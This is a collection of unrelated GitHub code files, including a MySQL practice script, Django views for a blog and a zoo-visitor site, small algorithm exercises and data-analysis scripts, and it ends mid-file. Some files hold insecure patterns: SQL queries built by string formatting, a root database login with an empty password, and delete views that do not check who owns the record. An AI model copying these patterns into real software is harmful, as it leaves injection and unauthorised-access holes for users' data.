{"seq_id":"31509984282","text":"import mysql.connector\nclass Student:\n\n    def __init__(self, roll, name, age, email, address):\n        self.roll = roll\n        self.name = name\n        self.age = age\n        self.email = email\n        self.address = address\n\n    def showStudent(self):\n        print(\"Roll Number {} belongs to {}\".format(self.roll,self.name))\n\n    def getStudentDetails(self):\n        data = \"{},{},{},{},{}\\n\".format(self.roll, self.name, self.age, self.email, self.address)\n        return data\n\ns1 = Student(1,\"John\",20,\"john@example.com\",\"Redwood Shores\")\ns2 = Student(2,\"Jennie\",30,\"jennie@example.com\",\"Country Homes\")\n\ns1.showStudent()\ns2.showStudent()\n\ncon = mysql.connector.connect(user=\"root\",password=\"\",host=\"localhost\",database=\"test\")\nprint(\"Is Connection Established:\",con.is_connected())\nprint(type(con))\ncursor = con.cursor()\nprint(type(cursor))\n\n\nsql2 = \"insert into test values('{}',{},'{}','{}')\".format(s1.name,s1.age,s1.email,s1.address)\n\n\ncursor.execute(sql2)\n\ncon.commit()\nprint(\"Student Saved !!\")","repo_name":"pulkitkomal/Auribises_Practice","sub_path":"Third Week/MySql1.py","file_name":"MySql1.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"28181523448","text":"from django.shortcuts import render, redirect\nfrom .models import Category, Article\nfrom .forms import ArticleForm\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\n\n\nclass ArticleListView(ListView):\n    model = Article\n    template_name = 'blog/index.html'\n    context_object_name = 'articles'\n    extra_context = {\n        'title': 'PROWEB-Movies'\n    }\n\n\n\n\nclass ArticleListByCategory(ArticleListView):\n\n    def get_queryset(self):\n        articles = Article.objects.filter(category_id=self.kwargs['pk'])\n        return articles\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data()\n        category = Category.objects.get(pk=self.kwargs['pk'])\n        context['title'] = f'{category.title}'\n        return context\n\n\n\n\nclass ArticleDetailView(DetailView):\n    model = Article\n    context_object_name = 'article'\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data()\n        article = Article.objects.get(pk=self.kwargs['pk'])\n        context['title'] = f'{article.title}'\n        return context\n\n\n\n\n\n\nclass NewArticle(CreateView):\n    form_class = ArticleForm\n    template_name = 'blog/add_category.html'\n    extra_context = {\n        'title': 'Add'\n        
}\n\n\n","repo_name":"Ilxom1221/project_Django-1","sub_path":"project/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71856097534","text":"import socket\n#client\nHOST = '192.168.43.166'\nPORT = 2055 \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n#s.sendall('Hello, world')\nwhile True:\n\tdata = s.recv(1024).decode()\n\tprint(data)\n\ns.close()\n\n","repo_name":"pankaj-pundir/The-projects","sub_path":"dexterous/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"4166618387","text":"#!/usr/bin/python3\n\n'''\n\tfind_range.py\n\n\tGiven a sorted array, with possible duplicated values and a given target, find the first and last index where that target is\n\tReturn -1 if there is no entry in the list \n\n\tcreated: 09/25/2020\n\n\tversion: 1.0\n'''\n\n################################ function definition ########################################\ndef bin_search(arr, s_idx, e_idx, target):\n\n\t#base case \n\tif s_idx == e_idx:\n\t\tif arr[s_idx] == target:\n\t\t\treturn s_idx\n\t\telse: \n\t\t\treturn -1\n\n\t#find the midpoint and check whether that's the location of the target value\n\tmid = (s_idx + e_idx)//2\n\n\tif arr[mid] == target: \n\t\treturn mid \n\telif arr[mid] > target: \n\t\treturn bin_search(arr, s_idx, mid - 1, target)\n\telse: \n\t\treturn bin_search(arr, mid + 1, e_idx, target)\n\n\ndef find_range(arr, target):\n\n\t#local variables \n\tfirst = last = bin_search(arr, 0, len(arr) - 1, target)\n\te_idx = len(arr)\n\t\n\n\n\t#check the result and terminate the function if the result is not found \n\tif (first == -1):\n\t\treturn -1\n\n\t#traverse to both left and right to find the first and last position \n\t#keep close track to ensure it's not going out of bounds \n\tprev = first - 1\n\n\twhile 1: \n\t\tif prev != -1 and arr[prev] == target: \n\t\t\tfirst -= 1\n\t\t\tprev -= 1\n\t\telse: \n\t\t\tbreak\n\n\tnxt = last + 1\n\n\twhile 1: \n\t\tif nxt != e_idx and arr[nxt] == target: \n\t\t\tlast += 1\n\t\t\tnxt += 1\n\t\telse:\n\t\t\tbreak\n\n\t#return the range\n\treturn (first, last)\n\n################################### main function ##########################################\n#local variables \narr = [1, 1, 2, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6]\n\n#call the function \nidx = find_range(arr, 4)\n\n#check whether the value was in the array and display the result\nif (idx == -1):\n\tprint(\"Value was not in the array\")\nelse: \n\tprint(\"Range is : \" +str(idx[0]) + \",\" +str(idx[1]))\n","repo_name":"maihan040/Python_Random_Scripts","sub_path":"findRange.py","file_name":"findRange.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11523830254","text":"from django.shortcuts import render,redirect,HttpResponse\nfrom accounts.models import *\nfrom .forms import *\nfrom datetime import date\nfrom Director.forms import *\nfrom django.contrib.auth import authenticate\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nimport time\n\n\n@login_required()\ndef loadVisitorHome(request):\n ticketObj = Ticket.objects.filter(uid = request.user.id).values('tdate')\n applicationObj = Applications.objects.filter(uid = 
request.user.id).values('date')\n    feedbackObj = Feedback.objects.filter(uid = request.user.id).values('fdate')\n    complaintObj = Complaints.objects.filter(uid = request.user.id).values('cdate')\n\n    ticket = []\n    application = []\n    feedback = []\n    complaint = []\n\n    for i in ticketObj:\n        if i['tdate'].year == date.today().year and i['tdate'].month == date.today().month:\n            ticket.append(i)\n\n    for i in applicationObj:\n        if i['date'].year == date.today().year and i['date'].month == date.today().month:\n            application.append(i)\n\n    for i in feedbackObj:\n        if i['fdate'].year == date.today().year and i['fdate'].month == date.today().month:\n            feedback.append(i)\n\n    for i in complaintObj:\n        if i['cdate'].year == date.today().year and i['cdate'].month == date.today().month:\n            complaint.append(i)\n    \n\n    context = {\n        'ticket':len(ticket),\n        'application':len(application),\n        'feedback':len(feedback),\n        'complaints':len(complaint)\n    }\n\n    return render(request,'visitorhome.html',context)\n\n\n@login_required()\ndef viewTickets(request):\n    tickets = Ticket.objects.filter(uid = request.user.id)\n    Ticket.objects.filter(payment_status = False).delete()\n    current_date = date.today()\n    return render(request,'view tickets.html',{'tickets':tickets,'current':current_date})\n\n\n@login_required()\ndef showTicketDetails(request,id):\n    catagories = BookedCatagory.objects.filter(ticket = id)\n    return render(request,'ticket details.html',{'catagories':catagories})\n\n\ndef current_date_slot_check(book_date,book_slot):\n    # book_date arrives from the POST data as a 'YYYY-MM-DD' string,\n    # so parse it before comparing against today's date\n    booking_date = date.fromisoformat(book_date)\n    if booking_date < date.today():\n        return False\n    if booking_date == date.today():\n        now = time.strftime(\"%H:%M:%S\",time.localtime())\n        if book_slot == 'morning' and now > '12:00:00':\n            return False\n        elif book_slot == 'noon' and now > '15:00:00':\n            return False\n    return True\n\n\n@login_required()\ndef bookTicket(request):\n    ticketform = TicketForm()\n    catagories = TicketRate.objects.all()\n    capacity = ZooDetails.objects.get(pk=1).visitor_capacity\n\n    if request.method == 'GET':\n        return render(request,'book ticket.html',{'form':ticketform,'catagories':catagories})\n\n    elif request.method == 'POST':\n        form = TicketForm(request.POST)\n        tRate =TicketRate.objects.all()\n\n        book_date = request.POST['reporting_date']\n        book_slot = request.POST['reporting_time']\n        # print(book_slot,book_date)\n\n        current_count = Ticket.objects.filter(reporting_date = book_date, reporting_time = book_slot).count()\n\n        if form.is_valid():\n            c = current_date_slot_check(book_date,book_slot)\n            # print(c)\n            if c == True:\n                obj = form.save(commit=False)\n                count_list = request.POST.getlist('catagory')\n                booked_count = sum([int(i) for i in count_list])\n\n                if booked_count != 0:\n                    flag = True\n                    \n                    for c in [int(i) for i in count_list]:\n                        if c < 0:\n                            flag = False\n                    \n                    if flag:\n                        if current_count + booked_count < capacity:\n                            i = 0\n                            total = 0\n                            total_count = 0\n\n                            for rate in tRate:\n                                if int(count_list[i]) != 0:\n                                    catagory_rate = TicketRate.objects.get(type=rate.type)\n                                    total += int(count_list[i]) * catagory_rate.rate\n                                    total_count += int(count_list[i]) \n\n                                i = i+1\n\n                            obj.total = total\n                            obj.total_person = total_count\n                            obj.uid = request.user\n                            obj.save()\n\n                            j=0\n\n                            for rate in tRate:\n                                if int(count_list[j]) != 0:\n                                    BookedCatagory.objects.create(catagory = TicketRate.objects.get(type=rate.type).type,count = count_list[j],rate = TicketRate.objects.get(type=rate.type).rate,ticket = obj)\n                                \n                                j=j+1\n                            \n                            return 
redirect('visitor_confirm_booking')\n else:\n messages.error(request,'visitor capacity exceeded for this booking slot, Please choose another slot for proceed booking!')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n\n else:\n messages.error(request,'Please provide valid count of tickets')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n \n else:\n messages.error(request,'You are booking ticket with ZERO visitors please provide valid no. of visitors in available catagories')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n\n else:\n messages.error(request,'You are booking ticket for a past time please provide future date and slot for booking')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n \n else:\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n \n else:\n return render(request,'book ticket.html',{'form':ticketform,'catagories':catagories}) \n\n\n@login_required()\ndef confirmBooking(request):\n ticketStatus = Ticket.objects.filter(payment_status = False).exists()\n if ticketStatus:\n obj = Ticket.objects.get(payment_status=False)\n return render(request,'confirm booking.html',{'ticket':obj})\n\n\n@login_required()\ndef declinePayment(request,id):\n ticket = Ticket.objects.get(pk=id)\n ticket.delete()\n return redirect('visitor_view_tickets')\n\n\n@login_required()\ndef acceptPayment(request,id):\n ticket = Ticket.objects.get(pk=id)\n ticket.payment_status = True\n ticket.save()\n messages.success(request,'Ticket booked successfully')\n return redirect('visitor_view_tickets')\n\n\n@login_required()\ndef cancelBooking(request,id):\n ticket = Ticket.objects.get(pk=id)\n ticket.delete()\n messages.success(request,'Booking cancelled successfully')\n return redirect('visitor_view_tickets')\n\n\n@login_required()\ndef showFeedbacks(request):\n feedbacks = Feedback.objects.filter(uid = request.user.id)\n feedbackForm = FeedbackForm()\n\n if request.method == 'GET':\n return render(request,'visitor view feedbacks.html',{'feedbacks':feedbacks,'form':feedbackForm})\n\n elif request.method == 'POST':\n form = FeedbackForm(request.POST)\n\n if form.is_valid():\n obj = form.save(commit=False)\n obj.uid = request.user\n obj.save()\n messages.success(request,'Feedback send successfully')\n return redirect('visitor_view_feedback')\n else:\n return render(request,\"visitor view feedbacks.html\",{'feedbacks':feedbacks,'form':form,'error':True})\n else:\n return render(request,'visitor view feedbacks.html',{'feedbacks':feedbacks,'form':feedbackForm})\n\n\n@login_required()\ndef deleteFeedback(request,id):\n feedback = Feedback.objects.get(pk=id)\n feedback.delete()\n messages.success(request,'Feedback deleted successfully')\n return redirect('visitor_view_feedback')\n\n\n@login_required()\ndef viewComplaints(request):\n complaints = Complaints.objects.filter(uid = request.user.id)\n recipient = Users.objects.filter(usertype__in = ['curator','director'])\n # print(recipient[0].usertype)\n complaintForm = ComplaintForm()\n\n if request.method == 'GET':\n return render(request,'visitor view complaints.html',{'complaints':complaints,'form':complaintForm,'recipients':recipient})\n\n elif request.method == 'POST':\n recipient = request.POST['recipient']\n form = ComplaintForm(request.POST)\n\n if form.is_valid():\n obj = form.save(commit=False)\n obj.uid = Users.objects.get(pk=request.user.id)\n obj.rid = Users.objects.get(pk=recipient)\n 
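The `bookTicket` view above combines two guards before saving a reservation: a date/slot cut-off check and a per-slot capacity count. A framework-free sketch of the cut-off rule (the 12:00/15:00 cut-offs mirror the view's `'morning'`/`'noon'` strings; everything else here is hypothetical) makes the rule easy to test in isolation:

```python
from datetime import date, datetime

SLOT_CUTOFFS = {'morning': '12:00:00', 'noon': '15:00:00'}  # assumed cut-off times

def slot_is_bookable(book_date, book_slot, now=None):
    """Return True if a 'YYYY-MM-DD' date/slot pair is still open for booking."""
    now = now or datetime.now()
    booking_date = date.fromisoformat(book_date)
    if booking_date < now.date():
        return False                      # past days are never bookable
    if booking_date == now.date():
        cutoff = SLOT_CUTOFFS.get(book_slot)
        if cutoff and now.strftime('%H:%M:%S') > cutoff:
            return False                  # today's slot has already started
    return True

# example: a noon slot checked at 16:00 the same day is rejected
probe = datetime(2023, 5, 1, 16, 0, 0)
print(slot_is_bookable('2023-05-01', 'noon', now=probe))   # False
print(slot_is_bookable('2023-05-02', 'noon', now=probe))   # True
```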
obj.save()\n messages.success(request,'Complaint registered successfully')\n return redirect('visitor_view_complaints')\n else:\n return render(request,\"visitor view complaints.html\",{'complaints':complaints,'form':form,'recipients':recipient,'error':True})\n else:\n return render(request,'visitor view complaints.html',{'complaints':complaints,'form':complaintForm,'recipients':recipient})\n\n\n@login_required()\ndef deleteComplaint(request,id):\n complaint = Complaints.objects.get(pk=id)\n complaint.delete()\n messages.success(request,'Complaint deleted successfully')\n return redirect('visitor_view_complaints')\n\n\n@login_required()\ndef viewProfile(request):\n profileForm = UpdateProfileForm(instance=request.user)\n profileImageForm = ProfileImageForm(instance=request.user)\n if request.method == 'GET':\n return render(request,'visitor update profile.html',{'form':profileForm,'imageform':profileImageForm})\n\n elif request.method == 'POST':\n form = UpdateProfileForm(request.POST,instance=request.user)\n\n if form.is_valid():\n form.save()\n messages.success(request,'profile updated successfully')\n return redirect('visitor_view_profile')\n else:\n messages.error(request,'Error while submitting form')\n return render(request,'visitor update profile.html',{'form':form})\n else:\n return render(request,'visitor update profile.html',{'form':profileForm})\n\n\n@login_required()\ndef updateProfileImage(request):\n profileImageForm = ProfileImageForm(instance=request.user)\n if request.method == 'POST':\n form = ProfileImageForm(request.POST,request.FILES,instance = request.user)\n if form.is_valid():\n form.save()\n messages.success(request,'profile image updated successfully')\n return redirect('visitor_view_profile')\n else:\n return render(request,'visitor update profile.html',{'form':form,'imageform':profileImageForm,'error':True})\n\n\n@login_required()\ndef deleteProfileImage(request):\n userObj = Users.objects.get(pk=request.user.id)\n userObj.profile = 'null'\n userObj.save()\n messages.success(request,'profile photo deleted successfully!')\n return redirect('visitor_view_profile')\n\n\n@login_required()\ndef changePassword(request):\n currentPassword = request.POST['password']\n newPassword = request.POST['newpassword']\n renewPassword = request.POST['renewpassword']\n\n user = authenticate(username = request.user.username , password = currentPassword)\n\n if user:\n if newPassword == renewPassword:\n request.user.set_password(newPassword)\n request.user.save()\n messages.success(request,'Password changed successfully!')\n return redirect('login_user')\n else:\n messages.error(request,'new and reentered passwords mismatch!')\n return redirect('visitor_view_profile')\n else:\n messages.error(request,'current password is wrong!')\n return redirect('visitor_view_profile')\n\n\n@login_required()\ndef viewVacancy(request):\n vacancy = JobVacancy.objects.all()\n application = Applications.objects.filter(uid = request.user.id)\n return render(request,'view vacancy.html',{'vacancies':vacancy,'appl_obj':application})\n\n\n@login_required()\ndef apply(request,id):\n vacancy = JobVacancy.objects.get(pk=id)\n applicationForm = ApplicationForm()\n\n if request.method == 'GET':\n return render(request,'apply job.html',{'form':applicationForm,'vacancy':vacancy})\n\n elif request.method == 'POST':\n form = ApplicationForm(request.POST,request.FILES)\n\n if form.is_valid():\n obj = form.save(commit=False)\n obj.vacancy = vacancy\n obj.uid = request.user\n obj.status = 'unreviewed'\n obj.save()\n 
messages.success(request,'Application submitted successfully!')\n            return redirect('visitor_view_vacancy')\n        else:\n            messages.error(request,'Error while submitting form!')\n            return render(request,'apply job.html',{'form':form,'vacancy':vacancy})\n    else:\n        return render(request,'apply job.html',{'form':applicationForm,'vacancy':vacancy})\n\n\n@login_required()\ndef viewApplications(request):\n    applications = Applications.objects.filter(uid = request.user.id)\n    return render(request,'view applications.html',{'applications':applications})\n\n\n@login_required()\ndef deleteApplication(request,id):\n    application = Applications.objects.get(pk=id)\n    application.delete()\n    messages.success(request,'Application deleted successfully')\n    return redirect('visitor_view_job_application')","repo_name":"ajay-aju-0/Main-project","sub_path":"ZMS/Visitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"3457964789","text":"\n\nfrom hendrik_active.Image_Processing.poisson_noise_and_snr.k_Space.KSpace import KSpace\nfrom manimlib.imports import *\nfrom hendrik_old.Image_Processing.FourierIdea.FourierMathJuggling import FourierMathJuggling\n\nglobal k_plane_size\nk_plane_size=0.7\n\n\nscene = \"Scene2_with_phase_change_try3\" # FULL ANIMATION SCENE phase but no real_out\nclass Scene2_with_phase_change_try3(ThreeDScene): # with real plane on the right\n\n    def construct(self):\n        run_setting = {\"run_time\": 1 , \"rate_func\": linear}\n        postion_setting={\"preset_position\":\"LEFT\",\"center_dist\": 1}\n        self.set_camera_orientation(phi=75 * DEGREES, theta=-60 * DEGREES)  # 2.5D\n        self.camera.frame_center.shift(2 * OUT)\n        #pixels = 19 #this is how it should be\n        pixels=3 # only shortly\n        #math_preparation:\n        k_math=FourierMathJuggling.k_from_preset_minimal(pixels,**postion_setting)\n        k_disp= KSpace(pixel_len=pixels)\n        img_kamp,img_kph= k_math.get_amp_and_ph()\n        k_disp.fill_k_space_updater(img_kamp)\n        self.add(k_disp)\n\n        k_math = FourierMathJuggling.k_from_preset_minimal(pixels, **postion_setting)\n        k_disp = KSpace(pixel_len=pixels)\n        img_kamp, img_kph = k_math.get_amp_and_ph()\n        k_disp.fill_k_space_updater(img_kamp)\n        # k_disp.r()\n        self.add(k_disp)\n\n        def update_phase(mob):\n            val= my_phase_tracker.get_value()\n            k_math.phase_shift_single(val, **postion_setting)\n            img_kamp, img_kph=k_math.get_amp_and_ph()\n            mob.set_phase_flowers_updater (img_kamp, img_kph)\n            mob.set_shade_in_3d(True)\n            return mob\n        my_phase_tracker = ValueTracker(0)\n        for i in range(0,2):\n            self.play(my_phase_tracker.increment_value, 90,  # <- \"Master\" update first\n                      UpdateFromFunc(k_disp, update_phase),\n                      rate_func=linear)\n        self.wait(1)\n\n\nif __name__ == \"__main__\":\n    module_name = os.path.basename(__file__)\n    command_A = \"manim  -p -l -c '#1C758A' --video_dir ~/Downloads/  \"\n    command_B = module_name +\" \" + scene\n    os.system(command_A + command_B)","repo_name":"kolibril13/manim-3b1b-kolibril-backup","sub_path":"FourierIdea/b_scene_test_3d_del.py","file_name":"b_scene_test_3d_del.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
{"seq_id":"12169693972","text":"\"\"\"\nAmong the numbers from 1 to 13, the digit 1 appears a total of 6 times: in 1, 10, 11, 12 and 13. 
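The manim scene above drives its phase animation by advancing a `ValueTracker` and re-rendering the mobject through `UpdateFromFunc` on every frame, with the "master" tracker updated first. A stripped-down sketch of that tracker/updater pattern, using the same old 3b1b-style `manimlib` API as the scene (the project-specific `KSpace` class is omitted and a plain `Square` stands in):

```python
from manimlib.imports import *  # old 3b1b-style manim, as in the scene above

class TrackerUpdateDemo(Scene):
    def construct(self):
        tracker = ValueTracker(0)   # the "master" value being animated
        square = Square()

        def update_square(mob):
            # re-derive the mobject's state from the tracker on every frame
            mob.set_width(1 + tracker.get_value() / 90)
            return mob

        self.add(square)
        # the tracker increments first, then the updater re-renders from it
        self.play(tracker.increment_value, 90,
                  UpdateFromFunc(square, update_square),
                  rate_func=linear)
        self.wait()
```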
\nGiven integers i, j, and k as parameters, \ncomplete the solution function so that it returns how many times k appears in the numbers from i to j.\n\"\"\"\n\ndef solution(i, j, k):\n    answer = 0\n    for n in range(i, j+1):\n        answer += str(n).count(str(k))\n    return answer\n\nprint(solution(1, 13, 1))\nprint(solution(10, 50, 5))\nprint(solution(3, 10, 2))","repo_name":"kimgyuhee/Python","sub_path":"Chapter0_Algorithm/2304/230407/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
{"seq_id":"72530489215","text":"# https://leetcode.com/problems/maximal-square/discuss/61935/6-lines-Visual-Explanation-O(mn)\n# leetcode time cost : 152 ms\n# leetcode memory cost : 14.3 MB \n# using more of Python and some \"tricks\"\nclass Solution:\n    def maximalSquare(self, A):\n        for i, r in enumerate(A):\n            r = A[i] = list(map(int, r))\n            for j, c in enumerate(r):\n                if i * j * c:\n                    r[j] = min(A[i-1][j], r[j-1], A[i-1][j-1]) + 1\n        return max(map(max, A + [[0]])) ** 2\n\ndef main():\n    matrix = [[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]] # expect is 4\n    Solution_obj = Solution()\n    result = Solution_obj.maximalSquare(matrix)\n    print(\"result value is \",result)\n    \nif __name__ =='__main__':\n    main()        ","repo_name":"sky-dream/LeetCodeProblemsStudy","sub_path":"[0221][Medium][Maximal_Square]/Maximal_Square_2.py","file_name":"Maximal_Square_2.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
{"seq_id":"17891818540","text":"from a10sdk.common.A10BaseClass import A10BaseClass\n\n\nclass ServiceConfig(A10BaseClass):\n    \n    \"\"\"Class Description::\n    Configure scaleout templates for SLB, CGN and VRRP.\n\n    Class service-config supports CRUD Operations and inherits from `common/A10BaseClass`.\n    This class is the  `\"PARENT\"` class for this module.`\n\n    :param uuid: {\"description\": \"uuid of the object\", \"format\": \"string\", \"minLength\": 1, \"modify-not-allowed\": 1, \"optional\": true, \"maxLength\": 64, \"type\": \"string\"}\n    :param template_list: {\"minItems\": 1, \"items\": {\"type\": \"template\"}, \"uniqueItems\": true, \"array\": [{\"required\": [\"name\"], \"properties\": {\"device-group\": {\"description\": \"Device group id\", \"format\": \"number\", \"type\": \"number\", \"maximum\": 16, \"minimum\": 1, \"optional\": true}, \"bucket-count\": {\"description\": \"Number of traffic buckets\", \"format\": \"number\", \"default\": 256, \"optional\": true, \"maximum\": 256, \"minimum\": 1, \"type\": \"number\"}, \"name\": {\"description\": \"Scaleout template Name\", \"format\": \"string\", \"minLength\": 1, \"optional\": false, \"maxLength\": 63, \"type\": \"string\"}, \"uuid\": {\"description\": \"uuid of the object\", \"format\": \"string\", \"minLength\": 1, \"modify-not-allowed\": 1, \"optional\": true, \"maxLength\": 64, \"type\": \"string\"}}}], \"type\": \"array\", \"$ref\": \"/axapi/v3/scaleout/{cluster-id}/service-config/template/{name}\"}\n    :param DeviceProxy: The device proxy for REST operations and session handling. 
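The condensed maximal-square solution above encodes the classic DP recurrence: a cell can extend a square only as far as its left, top, and top-left neighbours allow. A more explicit version of the same O(mn) idea, with a hypothetical example grid:

```python
def maximal_square(matrix):
    """Area of the largest all-'1' square, via dp[i][j] = square side ending at (i, j)."""
    if not matrix or not matrix[0]:
        return 0
    rows, cols = len(matrix), len(matrix[0])
    dp = [[0] * cols for _ in range(rows)]
    best = 0
    for i in range(rows):
        for j in range(cols):
            if matrix[i][j] == '1':
                if i == 0 or j == 0:
                    dp[i][j] = 1   # border cells can only start a 1x1 square
                else:
                    # a square grows only as far as its weakest neighbour allows
                    dp[i][j] = min(dp[i-1][j], dp[i][j-1], dp[i-1][j-1]) + 1
                best = max(best, dp[i][j])
    return best * best

grid = [["1","0","1","0","0"],
        ["1","0","1","1","1"],
        ["1","1","1","1","1"],
        ["1","0","0","1","0"]]
print(maximal_square(grid))   # 4
```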
Refer to `common/device_proxy.py`\n\n \n\n URL for this object::\n `https:////axapi/v3/scaleout/{cluster_id}/service-config`.\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n self.required=[]\n self.b_key = \"service-config\"\n self.a10_url=\"/axapi/v3/scaleout/{cluster_id}/service-config\"\n self.DeviceProxy = \"\"\n self.uuid = \"\"\n self.template_list = []\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\n","repo_name":"a10networks/a10sdk-python","sub_path":"a10sdk/core/scaleout/scaleout_service_config.py","file_name":"scaleout_service_config.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"35117946391","text":"# -- coding: utf-8 --\n\nclass NumArray(object):\n def __init__(self, nums):\n \"\"\"\n :type nums: List[int]\n \"\"\"\n current_sum = 0\n self.sums = []\n for n in nums:\n current_sum += n\n self.sums.append(current_sum)\n\n def sumRange(self, i, j):\n \"\"\"\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n if i == 0:\n return self.sums[j]\n else:\n return self.sums[j] - self.sums[i-1]\n\n\n\n # Your NumArray object will be instantiated and called as such:\n # obj = NumArray(nums)\n # param_1 = obj.sumRange(i,j)","repo_name":"filosfino/leetcode","sub_path":"Algorithms/Q303_Range_Sum_Query_-_Immutable.py","file_name":"Q303_Range_Sum_Query_-_Immutable.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"18887756220","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ninfile = 'bike.csv'\ndf = pd.read_csv(infile)\ndf['datetime'] = pd.to_datetime(df['datetime'])\ndf = df.set_index('datetime')\ndf['year'] = df.index.year\ndf['month'] = df.index.month\ndf['day'] = df.index.day\ndf['hour'] = df.index.hour\n\nplt.rcParams['font.sans-serif'] = ['SimHei'] #解决plt中文显示的问题\nplt.rcParams['axes.unicode_minus'] = False #解决plt负号显示的问题\n\nyear = df.groupby(lambda x: x.year).mean()\nyear[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每年租赁数分布图')\nplt.show()\n\nquarter = df.groupby('month').mean()\nquarter[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每月租赁数分布图')\nplt.show()\n\nm_bike = df.resample('M').mean()\nfig, axes = plt.subplots(2, 1) #两行一列\nm_bike['2011'][['count']].plot(ax=axes[0],sharex=True) #贡献X轴\nm_bike['2012'][['count']].plot(ax=axes[1])\nplt.title('自行车每月租赁数分布图')\nplt.show()\n\nday = df.groupby('day').mean()\nday[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每日租赁数分布图')\nplt.show()\n\nhour = df.groupby('hour').mean()\nhour[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每小时租赁数分布图')\nplt.show()\n\nweather = df.groupby('weather').mean()\nweather[['count']].plot(kind='bar',rot=360)\nplt.title('天气情况与自行车租赁数分布图')\nplt.show()\n","repo_name":"wmj998/analysis","sub_path":"pandas入门/实验三/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32777638464","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sys\nimport math\nimport tikzplotlib\nimport os\n\nbuffer = \"\"\nwith open(\"rosc.cir\") as fi:\n for line in fi:\n if(line.startswith(\"VDD\")):\n buffer += \"VDD VDD VSS dc {vdd}\\n\"\n else:\n buffer += line\n\nfon = \"rosc_vdd\"\nvdds = np.linspace(0.3,1.5,num=20)\n\nos.system(f\"touch {fon}.yaml\")\nfor vdd in vdds:\n cir 
= buffer.replace(\"{vdd}\",str(vdd))\n with open(f\"{fon}.cir\", \"w\") as fo:\n fo.write(cir)\n os.system(f\"aimspice -o csv {fon}.cir\")\n os.system(f\" echo '{vdd}': >> {fon}.yaml\")\n os.system(f\"python3 freq.py {fon}.csv 'v(a1)' 4.1e-9 >> {fon}.yaml\")\n","repo_name":"wulffern/dicex","sub_path":"ex4/vddsweep.py","file_name":"vddsweep.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"42921902759","text":"# -*- coding: UTF-8 -*-\nimport logging\nimport traceback\nimport tushare as ts\nimport pandas as pd\nfrom datetime import datetime\nimport time\nfrom sqlalchemy import create_engine\ndef datelist(begin,end):\n date_l=[datetime.strftime(x,'%Y-%m-%d')for x in list(pd.date_range(start=begin,end=end))]\n return date_l\n\nlogging.basicConfig(level=logging.DEBUG,format='%(asctime)s %(filename)s[line:%(lineno)d)] %(levelname)s %(message)s',datefmt='%Y-%m-%d %H:%M:%S',filename='mylog.log',filemode='w')\ntoday=time.strftime('%Y-%m-%d',time.localtime())\ndaterange_l=datelist('2017-10-13','2017-10-13')\nengine=create_engine('mysql://root:Lewei50_MYSQL@localhost/test?charset=utf8')\n\nfor x in daterange_l:\n try:\n print (x)\n df=ts.get_day_all(x)\n if not df is None:\n df['date']=x\n #df.to_csv('day'+x+'.csv')d\n df.to_sql('gettodayall',engine,if_exists='append',index=False)\n time.sleep(0.2)\n logging.info ('to sql succeed')\n \n except Exception as e:\n logging.info(str(e))\n continue\n\n \n \n","repo_name":"laoliu1982/tutushare","sub_path":"AllPerDay.py","file_name":"AllPerDay.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"53753495","text":"# encoding: utf-8\n\"\"\"\nIn the Key of Python (version 0.1)\nInstrument Rack.\n\nAn instrument is a function that returns a single note in 